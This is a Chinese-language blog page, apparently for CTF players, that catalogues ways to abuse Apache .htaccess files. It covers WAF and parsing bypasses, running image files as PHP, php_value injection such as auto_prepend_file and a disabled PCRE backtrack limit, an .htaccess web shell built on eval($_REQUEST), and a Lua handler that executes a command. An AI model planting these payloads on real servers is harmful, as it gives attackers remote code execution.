Eki's blog Eki's blog
Home
  • Library

    • PHP
    • JAVA
    • Node
    • Python
  • Contest

    • D3CTF 2021 Write Up
    • 虎符CTF2021
    • 2021 红帽 Web Write Up
  • Problem Set

    • Ethernaut Write Up
Pentest
Develop
  • Friends
About
  • Website
  • Tools
  • Categories
  • Tags
  • Archives
GitHub (opens new window)

Eki

Dreamer of Dreams
Home
  • Library

    • PHP
    • JAVA
    • Node
    • Python
  • Contest

    • D3CTF 2021 Write Up
    • 虎符CTF2021
    • 2021 红帽 Web Write Up
  • Problem Set

    • Ethernaut Write Up
Pentest
Develop
  • Friends
About
  • Website
  • Tools
  • Categories
  • Tags
  • Archives
GitHub (opens new window)
  • Catalogue

    • PHP安全速查
    • JAVA安全速查
  • 隐写术
  • PHP

  • protocol
  • Java

  • Node

  • Python

  • Golang

  • Arbitrary Code Execution
  • Shell
  • SQLi
  • SSRF
  • SSTI
  • lfi
  • XSS
  • XXE
  • convert
  • .htaccess文件利用
    • CGI 相关
    • htshell
      • 利用lua
    • 参考资料
  • 序列化与反序列化问题小结
  • CTF
Eki
2021-05-10
目录

.htaccess文件利用

# .htaccess文件利用

# 正确解析绕过

.htaccess中出现的无法正常解析的条目时无法生效

  • \换行绕过脏字符或绕WAF

  • 利用XMP图片解析头(#刚好是注释符)

    #define width 1
    #define height 1
    
    1
    2
  • 利用wbmp文件解析头

    \x00\x00\x8a\x39\x8a\x39
    
    1

# 增加使用php解析 (可以类推)

  • 文件后缀(.jpg)

    AddType application/x-httpd-php .jpg
    
    1
  • 的文件

    <FilesMatch "<filename>">
    SetHandler application/x-httpd-php
    </FilesMatch>
    
    1
    2
    3

# 利用php_value注入php配置

  • 在所有php前后注入恶意php文件

    php_value auto_prepend_file "<FileDir>"
    php_value auto_append_file "<FileDir>"
    
    1
    2
  • 利用prce参数绕过preg_match

    php_value pcre.backtrack_limit 0
    php_value pcre.jit 0 
    
    1
    2

    任意匹配均返回FALSE

    https://www.php.net/manual/zh/pcre.configuration.php

  • 利用UTF-7编码绕过日志html编码

     php_value zend.multibyte 1
     php_value zend.script_encoding "UTF-7"
    
    1
    2
  • 利用inclue_path包含恶意文件

     php_value include_path "/tmp"
    
    1
  • 利用error log写本地文件 (html编码)

    php_value error_log /tmp/fl3g.php
    php_value error_reporting 32767
    
    1
    2
  • 强制开启短标签

    php_value short_open_tag 1  
    
    1

# CGI 相关

官方文档 https://httpd.apache.org/docs/2.4/howto/htaccess.html#cgi

Finally, you may wish to use a .htaccess file to permit the execution of CGI programs in a particular directory. This may be implemented with the following configuration:

Options +ExecCGI
AddHandler cgi-script cgi pl
1
2

# htshell

参考链接 https://github.com/wireghoul/htshells/

<FilesMatch .htaccess>
	SetHandler application/x-httpd-php
	Require all granted
	php_flag engine on
</FilesMatch>

AddType application/x-httpd-php .htaccess
## <?php eval($_REQUEST['eki']);?>
1
2
3
4
5
6
7
8

# 利用lua

AddHandler lua-script .lua
1
require "string"
function handle(r)
    r.content_type = "text/plain"
    if r.method == 'GET' then
        local a = io.popen('/readflag')
        local b = a:read("*all")
        r:puts(b)
    end
    return apache2.OK
end
1
2
3
4
5
6
7
8
9
10

# 参考资料

https://www.hacking8.com/MiscSecNotes/htaccess.html#title-9

编辑 (opens new window)
#htaccess
上次更新: 2022/01/17, 16:49:24
convert
序列化与反序列化问题小结

← convert 序列化与反序列化问题小结→

最近更新
01
QWB CTF2022 线下赛总决赛部分题解
08-25
02
CISCN2022 总决赛部分题解
08-25
03
DSCTF2022决赛 部分writeup
08-08
更多文章>
Theme by Vdoing | Copyright © 2019-2022 EkiXu | Creative Commons License
This work is licensed under a Creative Commons Attribution 4.0 International License.
  • 跟随系统
  • 浅色模式
  • 深色模式
  • 阅读模式